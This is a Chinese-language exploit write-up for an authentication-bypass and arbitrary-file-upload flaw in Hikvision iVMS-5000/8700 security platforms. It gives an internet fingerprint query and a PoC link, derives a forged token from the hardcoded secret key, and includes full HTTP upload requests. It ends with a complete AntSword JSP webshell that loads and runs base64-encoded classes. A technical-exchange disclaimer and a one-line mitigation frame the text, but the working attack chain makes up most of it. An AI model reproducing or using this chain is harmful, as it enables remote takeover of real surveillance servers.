此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
海康威视综合安防系统iVMS-5000
海康威视综合安防系统 iVMS-8700
鹰图指纹:web.body=“/views/home/file/installPackage.rar”
检测脚本PoC:https://github.com/sccmdaveli/hikvision-poc
单个URL检测 ivms-poc.py -u http://xxxxx
多个URL检测 ivms-poc.py -f file.txt
1.访问存在漏洞的网站,抓包
2.访问/eps/api/resourceOperations/upload
POST /eps/api/resourceOperations/upload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://you-ip
Connection: close
Cookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9
Upgrade-Insecure-Requests: 1
Content-Length: 62
service=http%3A%2F%2Fx.x.x.x%3Ax%2Fhome%2Findex.action
3.构造token绕过认证 (内部机制:如果token值与请求url+secretkey的md5值相同就可以绕过认证)
secretkey是代码里写死的(默认值:secretKeyIbuilding)
token值需要进行MD5加密(32位大写)
组合:token=MD5(url+“secretKeyIbuilding”)
4.成功绕过
5.上传一个包试试
显示上传成功且返回了resourceUuid值
验证路径:http://url/eps/upload/resourceUuid的值.jsp
POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1
Content-Length: 174
------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg
test
------WebKitFormBoundaryGEJwiloiPo
直接上传蚁剑jsp马,即可获得服务器权限
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
关闭互联网暴露面访问的权限,文件上传模块做好权限强认证
https://blog.csdn.net/qq_41904294/article/details/130807691